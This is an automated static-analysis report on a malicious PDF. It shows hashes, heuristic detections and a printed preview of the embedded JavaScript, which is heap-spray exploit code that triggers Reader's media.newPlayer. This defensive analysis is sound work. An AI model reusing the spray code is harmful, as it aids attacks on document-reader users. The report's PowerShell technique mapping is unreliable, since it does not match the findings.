Malicious PDF — malware analysis report

Static analysis result for SHA-256 a2b78296e97d85e8…

MALICIOUS

PDF

7.2 KB Created: 2009-12-17 16:59:10 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-11
MD5: a9642e80178fef10071b612c817e6a14 SHA-1: a594a7122e2712c991325806b59f74d0280bc80c SHA-256: a2b78296e97d85e8c52fe04f9bf71586ab50e25e08b20030b1a873ed6c680184
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT', 'PDF_JS', and 'PDF_UNESCAPE'. The presence of 'javascript_obj0021_000.js' as an extracted artifact further supports this. The unescape() function call suggests an attempt to deobfuscate malicious code. While the exact payload is not clear due to obfuscation, the overall pattern points to a malicious script execution attempt within the PDF.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var n = unescape("%u3f42%u3792");
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0021_000.js pdf-javascript-stream PDF /JS object 21 at offset 0x1883 401 bytes
SHA-256: db0440c0fa4ecbfbd8eee29fd9cd33bf5dc57ed0dcdc0562ae010467a305872c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var n = unescape("%u3f42%u3792"); 
var xxx = 0x8000;
while(n.length <= xxx) n += n;
n = n.substring(0, 0x8000 - asdsadas.length); 

var memory = new Array();

for(i = 0; i < 0x2000; i++)  memory[i] = n + asdsadas;
aaaaa = null;
jjjjj=decode64("dGhpcy5tZWRpYS5uZXdQbGF5ZXIoYWFhYWEpOw==");
try
{
	
	
}

catch(e){}

util.printd("p@000000000000000000000000 : pppp000", new Date());

Open this report in the interactive analyzer, or submit your own file for analysis.